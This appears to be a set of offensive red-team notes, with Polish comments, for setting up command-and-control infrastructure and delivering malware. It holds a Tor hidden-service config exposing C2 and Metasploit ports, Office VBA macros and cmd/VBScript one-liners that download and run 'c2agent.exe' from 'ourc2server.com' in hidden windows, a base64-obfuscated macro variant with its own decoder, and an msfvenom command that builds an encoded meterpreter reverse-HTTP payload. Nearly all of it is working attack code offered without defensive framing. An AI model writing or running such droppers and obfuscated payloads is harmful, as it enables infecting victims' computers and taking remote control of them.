# katalog ukrytej usługi
HiddenServiceeDir /home/wil/tor_hidden
# port sieciowy C2
HiddenServicePort 443 127.0.0.1:4433
# port SSH C2
HiddenServicePort 7022 127.0.0.1:7022
# nasłuch Metasploit C2
HiddenServicePort 8080 127.0.0.1:8080
---

Sub powershell()
'
' Powershell Macro
' '
Dim PSResponse As String
PSResponse = Shell("PowerShell (New-Object System.Net.WebClient).DownloadFile('http://ourc2server.com/download/c2agent.exe','agent.exe'");Start-Process 'agent.exe'", vbHide)
End Sub
---

cmd.exe /c "@echo open ourc2server.com>script.txt&@echo binary>>script.txt&@echo get /c2agent.exe>>script.txt&@echo quit>>script.txt&@ftp -s:script.txt -v -A&@start c2agent.exe"
---
strFileURL = "http://ourc2server/downloads/c2agent.exe"
strHDLocation = "agent.exe"
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()
If objXMLHTTP.Status = 200 Then
Set objADOStream = CreateObject("ADODB.Stream")
objADOStream.Open
objADOStream.Type = 1
objADOStream.Write objXMLHTTP.ResponseBody
objADOStream.Position = 0
objADOStream.SaveToFile strHDLocation
objADOStream.Close
Set objADOStream = Nothing
End if
Set objXMLHTTP = Nothing
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("agent.exe")
---

cmd.exe /c "@echo Set objXMLHTTP=CreateObject("MSXML2.XMLHTTP")>poc.vbs
&@echo objXMLHTTP.open "GET","http://ourc2server/downloads/c2agent.exe",false>>poc.vbs
&@echo objXMLHTTP.send()>>poc.vbs
&@echo If objXMLHTTP.Status=200 Then>>poc.vbs
&@echo Set objADOStream=CreateObject("ADODB.Stream")>>poc.vbs
&@echo objADOStream.Open>>poc.vbs
&@echo objADOStream.Type=1 >>poc.vbs
&@echo objADOStream.Write objXMLHTTP.ResponseBody>>poc.vbs
&@echo objADOStream.Position=0 >>poc.vbs
&@echo objADOStream.SaveToFile "agent.exe">>poc.vbs
&@echo objADOStream.Close>>poc.vbs
&@echo Set objADOStream=Nothing>>poc.vbs
&@echo End if>>poc.vbs
&@echo Set objXMLHTTP=Nothing>>poc.vbs
&@echo Set objShell=CreateObject("WScript.Shell")>>poc.vbs
&@echo objShell.Exec("agent.exe")>>poc.vbs&cscript.exe poc.vbs"
---

PS > $b = [System.Text.Encoding]::UTF8.GetBytes("PowerShell (New-Object System.Net.WebClient).DownloadFile('http://ourc2server.com/download/c2agent.exe','agent.exe');Start-Process 'agent.exe'")
PS > [System.Convert]::ToBase64String($b)
---

Option Explicit

Private Const clOneMask = 16515072
Private Const clTwoMask = 258048
Private Const clThreeMask = 4032
Private Const clFourMask = 63
Private Const clHighMask = 16711680
Private Const clMidMask = 65280
Private Const clLowMask = 255

Private Const cl2Exp18 = 262144
Private Const cl2Exp12 = 4096
Private Const cl2Exp6 = 64
Private Const cl2Exp8 = 256
Private Const cl2Exp16 = 65536

Public Function monkey(sString As String) As String

    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, 
    lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, 
    sOut As String
    Dim lTemp As Long

    sString = Replace(sString, vbCr, vbNullString)
    sString = Replace(sString, vbLf, vbNullString)

    lTemp = Len(sString) Mod 4

    If InStrRev(sString, "==") Then
        iPad = 2
    ElseIf InStrRev(sString, "=") Then
        iPad = 1
    End If

    For lTemp = 0 To 255
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4
            Case 43
                bTrans(lTemp) = 62
            Case 47
                bTrans(lTemp) = 63
        End Select
    Next lTemp

    For lTemp = 0 To 63
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp
    bIn = StrConv(sString, vbFromUnicode)
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)

    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))
        lTemp = lQuad And clHighMask
        bOut(lPos) = lTemp \ cl2Exp16
        lTemp = lQuad And clMidMask
        bOut(lPos + 1) = lTemp \ cl2Exp8
        bOut(lPos + 2) = lQuad And clLowMask
        lPos = lPos + 3
    Next lChar

    sOut = StrConv(bOut, vbUnicode)
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)
    monkey = sOut

End Function

Sub testb64()
'
' testb64 Macro
' '
Dim PSResp As String
PSResp = Shell(monkey("UG93ZXJTaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8vb3VyYzJzZXJ2ZXIuY29tL2Rvd25sb2FkL2MyYWdlbnQuZXhlJywnYWdlbnQuZXhlJyk7U3RhcnQtUHJvY2VzcyAnYWdlbnQuZXhlJw=="), vbHide)
End Sub
---

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter_reverse_http -e x86/fnstenv_mov -i 5 -f raw LPORT=1234 LHOST=ourc2server.com

---

